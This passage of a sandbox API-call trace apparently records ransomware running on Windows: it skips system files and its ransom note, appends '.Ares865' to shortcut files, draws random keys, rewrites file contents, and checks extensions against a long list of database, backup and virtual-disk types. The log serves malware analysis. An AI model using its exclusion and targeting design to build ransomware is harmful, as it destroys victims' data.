hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.270] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.270] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.271] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.271] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.271] CloseHandle (hObject=0x154) returned 1 [0068.271] CloseHandle (hObject=0x15c) returned 1 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.271] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cc40e0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x80cc40e0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x80cc40e0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x547, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sticky Notes.lnk", cAlternateFileName="STICKY~1.LNK")) returned 1 [0068.271] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.271] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="aoldtz.exe") returned 1 [0068.271] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2=".") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="..") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="windows") returned -1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="bootmgr") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="temp") returned -1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="pagefile.sys") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="boot") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="ids.txt") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="ntuser.dat") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="perflogs") returned 1 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2="MSBuild") returned 1 [0068.272] lstrlenW (lpString="Sticky Notes.lnk") returned 16 [0068.272] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sound Recorder.lnk") returned 69 [0068.272] lstrcpyW (in: lpString1=0x2cce466, lpString2="Sticky Notes.lnk" | out: lpString1="Sticky Notes.lnk") returned="Sticky Notes.lnk" [0068.272] lstrlenW (lpString="Sticky Notes.lnk") returned 16 [0068.272] lstrlenW (lpString="Ares865") returned 7 [0068.272] lstrcmpiW (lpString1="tes.lnk", lpString2="Ares865") returned 1 [0068.272] lstrlenW (lpString=".dll") returned 4 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2=".dll") returned 1 [0068.272] lstrlenW (lpString=".lnk") returned 4 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2=".lnk") returned 1 [0068.272] lstrlenW (lpString=".ini") returned 4 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2=".ini") returned 1 [0068.272] lstrlenW (lpString=".sys") returned 4 [0068.272] lstrcmpiW (lpString1="Sticky Notes.lnk", lpString2=".sys") returned 1 [0068.272] lstrlenW (lpString="Sticky Notes.lnk") returned 16 [0068.272] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.Ares865") returned 75 [0068.272] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sticky notes.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sticky notes.lnk.ares865"), dwFlags=0x1) returned 1 [0068.273] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\accessories\\sticky notes.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0068.273] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1351) returned 1 [0068.273] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0068.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0068.274] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0068.274] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0068.274] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0068.274] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.275] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x850, lpName=0x0) returned 0x154 [0068.275] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x850) returned 0x190000 [0068.275] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0068.276] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0068.276] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0068.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0068.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0068.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0068.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0068.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0068.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0068.276] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9710 [0068.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0068.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9710 | out: hHeap=0x2b0000) returned 1 [0068.276] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0068.276] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0068.276] CloseHandle (hObject=0x154) returned 1 [0068.276] CloseHandle (hObject=0x15c) returned 1 [0068.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0068.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0068.279] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0068.281] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c9baa28, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x3c9baa28, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x3ca06ce9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Center.lnk", cAlternateFileName="SYNCCE~1.LNK")) returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="aoldtz.exe") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2=".") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="..") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="windows") returned -1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="bootmgr") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="temp") returned -1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="pagefile.sys") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="boot") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="ids.txt") returned 1 [0068.282] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="ntuser.dat") returned 1 [0068.283] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="perflogs") returned 1 [0068.283] lstrcmpiW (lpString1="Sync Center.lnk", lpString2="MSBuild") returned 1 [0068.283] lstrlenW (lpString="Sync Center.lnk") returned 15 [0068.283] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Accessories\\Sticky Notes.lnk") returned 67 [0068.283] lstrcpyW (in: lpString1=0x2cce466, lpString2="Sync Center.lnk" | out: lpString1="Sync Center.lnk") returned="Sync Center.lnk" [0068.284] lstrlenW (lpString="Sync Center.lnk") returned 15 [0068.285] lstrlenW (lpString="Ares865") returned 7 [0068.285] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0068.294] lstrlenW (lpString=".dll") returned 4 [0068.295] lstrcmpiW (lpString1="Sync Center.lnk", lpString2=".dll") returned 1 [0068.295] lstrlenW (lpString=".lnk") returned 4 [0068.299] lstrcmpiW (lpString1="Sync Center.lnk", lpString2=".lnk") returned 1 [0068.299] lstrlenW (lpString=".ini") returned 4 [0068.299] lstrcmpiW (lpString1="Sync Center.lnk", lpString2=".ini") returned 1 [0068.299] lstrlenW (lpString=".sys") returned 4 [0068.299] lstrcmpiW (lpString1="Sync Center.lnk", lpString2=".sys") returned 1 [0068.299] lstrlenW (lpString="Sync Center.lnk") returned 15 [0068.300] lstrlenW (lpString="bak") returned 3 [0068.300] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0068.300] lstrlenW (lpString="ba_") returned 3 [0068.300] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0068.300] lstrlenW (lpString="dbb") returned 3 [0068.300] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0068.300] lstrlenW (lpString="vmdk") returned 4 [0068.301] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0068.301] lstrlenW (lpString="rar") returned 3 [0068.301] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0068.301] lstrlenW (lpString="zip") returned 3 [0068.301] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0068.301] lstrlenW (lpString="tgz") returned 3 [0068.301] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0068.304] lstrlenW (lpString="vbox") returned 4 [0068.304] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0068.304] lstrlenW (lpString="vdi") returned 3 [0068.304] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0068.304] lstrlenW (lpString="vhd") returned 3 [0068.304] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0068.304] lstrlenW (lpString="vhdx") returned 4 [0068.304] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0068.304] lstrlenW (lpString="avhd") returned 4 [0068.304] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0068.304] lstrlenW (lpString="db") returned 2 [0068.305] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0068.305] lstrlenW (lpString="db2") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0068.305] lstrlenW (lpString="db3") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0068.305] lstrlenW (lpString="dbf") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0068.305] lstrlenW (lpString="mdf") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0068.305] lstrlenW (lpString="mdb") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0068.305] lstrlenW (lpString="sql") returned 3 [0068.305] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0068.305] lstrlenW (lpString="sqlite") returned 6 [0068.305] lstrcmpiW (lpString1="er.lnk", lpString2="sqlite") returned -1 [0068.305] lstrlenW (lpString="sqlite3") returned 7 [0068.306] lstrcmpiW (lpString1="ter.lnk", lpString2="sqlite3") returned 1 [0068.307] lstrlenW (lpString="sqlitedb") returned 8 [0068.308] lstrcmpiW (lpString1="nter.lnk", lpString2="sqlitedb") returned -1 [0068.309] lstrlenW (lpString="xml") returned 3 [0068.309] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0068.310] lstrlenW (lpString="$er") returned 3 [0068.310] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0068.310] lstrlenW (lpString="4dd") returned 3 [0068.311] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0068.311] lstrlenW (lpString="4dl") returned 3 [0068.311] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0068.312] lstrlenW (lpString="^^^") returned 3 [0068.312] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0068.312] lstrlenW (lpString="abs") returned 3 [0068.313] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0068.313] lstrlenW (lpString="abx") returned 3 [0068.313] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0068.314] lstrlenW (lpString="accdb") returned 5 [0068.314] lstrcmpiW (lpString1="r.lnk", lpString2="accdb") returned 1 [0068.315] lstrlenW (lpString="accdc") returned 5 [0068.315] lstrcmpiW (lpString1="r.lnk", lpString2="accdc") returned 1 [0068.315] lstrlenW (lpString="accde") returned 5 [0068.316] lstrcmpiW (lpString1="r.lnk", lpString2="accde") returned 1 [0068.316] lstrlenW (lpString="accdr") returned 5 [0068.317] lstrcmpiW (lpString1="r.lnk", lpString2="accdr") returned 1 [0068.317] lstrlenW (lpString="accdt") returned 5 [0068.317] lstrcmpiW (lpString1="r.lnk", lpString2="accdt") returned 1 [0068.317] lstrlenW (lpString="accdw") returned 5 [0068.317] lstrcmpiW (lpString1="r.lnk", lpString2="accdw") returned 1 [0068.318] lstrlenW (lpString="accft") returned 5 [0068.318] lstrcmpiW (lpString1="r.lnk", lpString2="accft") returned 1 [0068.318] lstrlenW (lpString="adb") returned 3 [0068.318] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.319] lstrlenW (lpString="adb") returned 3 [0068.320] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0068.320] lstrlenW (lpString="ade") returned 3 [0068.320] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0068.320] lstrlenW (lpString="adf") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0068.353] lstrlenW (lpString="adn") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0068.353] lstrlenW (lpString="adp") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0068.353] lstrlenW (lpString="alf") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0068.353] lstrlenW (lpString="ask") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0068.353] lstrlenW (lpString="btr") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0068.353] lstrlenW (lpString="cat") returned 3 [0068.353] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0068.353] lstrlenW (lpString="cdb") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0068.354] lstrlenW (lpString="ckp") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0068.354] lstrlenW (lpString="cma") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0068.354] lstrlenW (lpString="cpd") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0068.354] lstrlenW (lpString="dacpac") returned 6 [0068.354] lstrcmpiW (lpString1="er.lnk", lpString2="dacpac") returned 1 [0068.354] lstrlenW (lpString="dad") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0068.354] lstrlenW (lpString="dadiagrams") returned 10 [0068.354] lstrcmpiW (lpString1="Center.lnk", lpString2="dadiagrams") returned -1 [0068.354] lstrlenW (lpString="daschema") returned 8 [0068.354] lstrcmpiW (lpString1="nter.lnk", lpString2="daschema") returned 1 [0068.354] lstrlenW (lpString="db-journal") returned 10 [0068.354] lstrcmpiW (lpString1="Center.lnk", lpString2="db-journal") returned -1 [0068.354] lstrlenW (lpString="db-shm") returned 6 [0068.354] lstrcmpiW (lpString1="er.lnk", lpString2="db-shm") returned 1 [0068.354] lstrlenW (lpString="db-wal") returned 6 [0068.354] lstrcmpiW (lpString1="er.lnk", lpString2="db-wal") returned 1 [0068.354] lstrlenW (lpString="dbc") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0068.354] lstrlenW (lpString="dbs") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0068.354] lstrlenW (lpString="dbt") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0068.354] lstrlenW (lpString="dbv") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0068.354] lstrlenW (lpString="dbx") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0068.354] lstrlenW (lpString="dcb") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0068.354] lstrlenW (lpString="dct") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0068.354] lstrlenW (lpString="dcx") returned 3 [0068.354] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0068.354] lstrlenW (lpString="ddl") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0068.355] lstrlenW (lpString="dlis") returned 4 [0068.355] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0068.355] lstrlenW (lpString="dp1") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0068.355] lstrlenW (lpString="dqy") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0068.355] lstrlenW (lpString="dsk") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0068.355] lstrlenW (lpString="dsn") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0068.355] lstrlenW (lpString="dtsx") returned 4 [0068.355] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0068.355] lstrlenW (lpString="dxl") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0068.355] lstrlenW (lpString="eco") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0068.355] lstrlenW (lpString="ecx") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0068.355] lstrlenW (lpString="edb") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0068.355] lstrlenW (lpString="epim") returned 4 [0068.355] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0068.355] lstrlenW (lpString="fcd") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0068.355] lstrlenW (lpString="fdb") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0068.355] lstrlenW (lpString="fic") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0068.355] lstrlenW (lpString="flexolibrary") returned 12 [0068.355] lstrcmpiW (lpString1="c Center.lnk", lpString2="flexolibrary") returned -1 [0068.355] lstrlenW (lpString="fm5") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0068.355] lstrlenW (lpString="fmp") returned 3 [0068.355] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0068.355] lstrlenW (lpString="fmp12") returned 5 [0068.355] lstrcmpiW (lpString1="r.lnk", lpString2="fmp12") returned 1 [0068.355] lstrlenW (lpString="fmpsl") returned 5 [0068.356] lstrcmpiW (lpString1="r.lnk", lpString2="fmpsl") returned 1 [0068.356] lstrlenW (lpString="fol") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0068.356] lstrlenW (lpString="fp3") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0068.356] lstrlenW (lpString="fp4") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0068.356] lstrlenW (lpString="fp5") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0068.356] lstrlenW (lpString="fp7") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0068.356] lstrlenW (lpString="fpt") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0068.356] lstrlenW (lpString="frm") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0068.356] lstrlenW (lpString="gdb") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.356] lstrlenW (lpString="gdb") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0068.356] lstrlenW (lpString="grdb") returned 4 [0068.356] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0068.356] lstrlenW (lpString="gwi") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0068.356] lstrlenW (lpString="hdb") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0068.356] lstrlenW (lpString="his") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0068.356] lstrlenW (lpString="ib") returned 2 [0068.356] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0068.356] lstrlenW (lpString="idb") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0068.356] lstrlenW (lpString="ihx") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0068.356] lstrlenW (lpString="itdb") returned 4 [0068.356] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0068.356] lstrlenW (lpString="itw") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0068.356] lstrlenW (lpString="jet") returned 3 [0068.356] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0068.357] lstrlenW (lpString="jtx") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0068.357] lstrlenW (lpString="kdb") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0068.357] lstrlenW (lpString="kexi") returned 4 [0068.357] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0068.357] lstrlenW (lpString="kexic") returned 5 [0068.357] lstrcmpiW (lpString1="r.lnk", lpString2="kexic") returned 1 [0068.357] lstrlenW (lpString="kexis") returned 5 [0068.357] lstrcmpiW (lpString1="r.lnk", lpString2="kexis") returned 1 [0068.357] lstrlenW (lpString="lgc") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0068.357] lstrlenW (lpString="lwx") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0068.357] lstrlenW (lpString="maf") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0068.357] lstrlenW (lpString="maq") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0068.357] lstrlenW (lpString="mar") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0068.357] lstrlenW (lpString="marshal") returned 7 [0068.357] lstrcmpiW (lpString1="ter.lnk", lpString2="marshal") returned 1 [0068.357] lstrlenW (lpString="mas") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0068.357] lstrlenW (lpString="mav") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0068.357] lstrlenW (lpString="maw") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0068.357] lstrlenW (lpString="mdbhtml") returned 7 [0068.357] lstrcmpiW (lpString1="ter.lnk", lpString2="mdbhtml") returned 1 [0068.357] lstrlenW (lpString="mdn") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0068.357] lstrlenW (lpString="mdt") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0068.357] lstrlenW (lpString="mfd") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0068.357] lstrlenW (lpString="mpd") returned 3 [0068.357] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0068.358] lstrlenW (lpString="mrg") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0068.358] lstrlenW (lpString="mud") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0068.358] lstrlenW (lpString="mwb") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0068.358] lstrlenW (lpString="myd") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0068.358] lstrlenW (lpString="ndf") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0068.358] lstrlenW (lpString="nnt") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0068.358] lstrlenW (lpString="nrmlib") returned 6 [0068.358] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0068.358] lstrlenW (lpString="ns2") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0068.358] lstrlenW (lpString="ns3") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0068.358] lstrlenW (lpString="ns4") returned 3 [0068.358] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0068.358] lstrlenW (lpString="nsf") 